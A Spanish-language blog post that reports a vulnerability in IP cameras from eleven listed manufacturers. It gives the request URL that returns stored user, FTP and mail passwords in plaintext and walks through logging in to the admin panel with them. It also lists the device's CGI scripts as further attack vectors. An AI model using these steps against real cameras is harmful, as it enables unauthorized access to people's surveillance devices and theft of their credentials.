Bug en varios modelos de cámaras IP dejan acceder a las contraseñas en texto plano y al panel de administración

Se ha dado a conocer una grave vulnerabilidad por la que una gran variedad de modelos populares de cámaras IP dejarían al descubierto en texto plano todas las contraseñas de usuarios tanto de las asociadas al servicio, como FTP o mail.

Por el momento, son 11 los fabricantes afectados y estos algunos de los fabricantes y modelos vulnerables:

• FOSCAM - FI9820W, FI9802W, FI8608W, FI8601W FI8602W, FI8620, FI8609W, FI8919WZ
• WANSVIEW - NCH-536MW, NCH536MW, NCH-532MW, NCH532MW, NCH-531MW, NCH531MW
• Suneyes - SP-HS05W, SP-HS02W
• DBPOWER - H.264 HD MEGAPIXEL IPCAM
• AGASIO - A522W, A622W
• DERICAM - H501W
• DSN-Q10
• NVH-589MW
• ASTAK MOLE
• EasyN - HS-691
• EasySE - H2

La forma de explotarla es bastante simple, teniendo el host de una cámara IP antes mencionadas, tenemos que poner lo siguiente:

http://host:port/web/cgi-bin/hi3510/param.cgi?cmd=getuser

Miren este ejemplo:

 Ponemos como antes dije http://host:port/web/cgi-bin/hi3510/param.cgi?cmd=getuser y nos aparecen las credenciales:

 Ahora accedemos a http://host:port/web/admin.html y ponemos el usuario y contraseña que encontramos en texto plano:

Y así de simple accedimos al panel de administración:

 

Bueno, esa es la forma rápida y fácil de hacerlo, pero existen muchos más vectores de ataques, por si les interesa les dejo el manual oficial CGI User Manual donde hay muchos más parámetros que se pueden usar.

Por si les interesa les dejo el contenido de http://host:port/cgi-bin/:

0KB      2011-10-18 06:01:47  adsl_init.cgi
0KB      2011-09-01 11:56:40  chkwifi.cgi
0KB      2011-10-18 06:01:47  ddns_start.cgi
1KB      2011-10-18 06:01:47  getadslattr.cgi
0KB      2011-10-18 06:01:47  getddnsattr.cgi
1KB      2011-10-18 06:01:47  getinetattr.cgi
0KB      2011-09-01 11:56:40  getinterip.cgi
0KB      2011-09-01 11:56:40  getnettype.cgi
145KB   2011-10-18 06:01:47  getupnp.cgi
145KB   2011-09-01 11:56:40  getwifi.cgi
1KB      2011-10-18 06:01:47  getwifiattr.cgi
0KB      2011-09-01 11:56:40  ptzctrldown.cgi
0KB      2011-09-01 11:56:41  ptzctrlleft.cgi
0KB      2011-09-01 11:56:40  ptzctrlright.cgi
0KB      2011-09-01 11:56:40  ptzctrlup.cgi
0KB      2011-09-01 11:56:41  ptzctrlzoomin.cgi
0KB      2011-09-01 11:56:40  ptzctrlzoomout.cgi
2KB      2011-09-01 11:56:40  ser.cgi
4KB      2011-10-18 06:01:47  setadslattr.cgi
2KB      2011-10-18 06:01:47  setddnsattr.cgi
3KB      2011-10-18 06:01:47  setinetattr.cgi
2KB      2011-10-18 06:01:47  setwifiattr.cgi
2KB      2011-09-01 11:56:41  testwifi.cgi
145KB   2011-10-18 06:01:46  upnp_start.cgi
145KB   2011-10-18 06:01:46  upnp_stop.cgi
145KB   2011-10-18 06:01:47  wifi_start.cgi
145KB   2011-10-18 06:01:47  wifi_stop.cgi

Aquí hay un foro de discución donde saque la mayoría de los hints: http://forum.hardware.fr/

Referencias:

• http://unaaldia.hispasec.com/
• https://cert.inteco.es/
• http://www.kb.cert.org/
• http://foscam.us/

Author & Editor

Ingeniero, me gusta la cyberseguridad, la programación y el blockchain.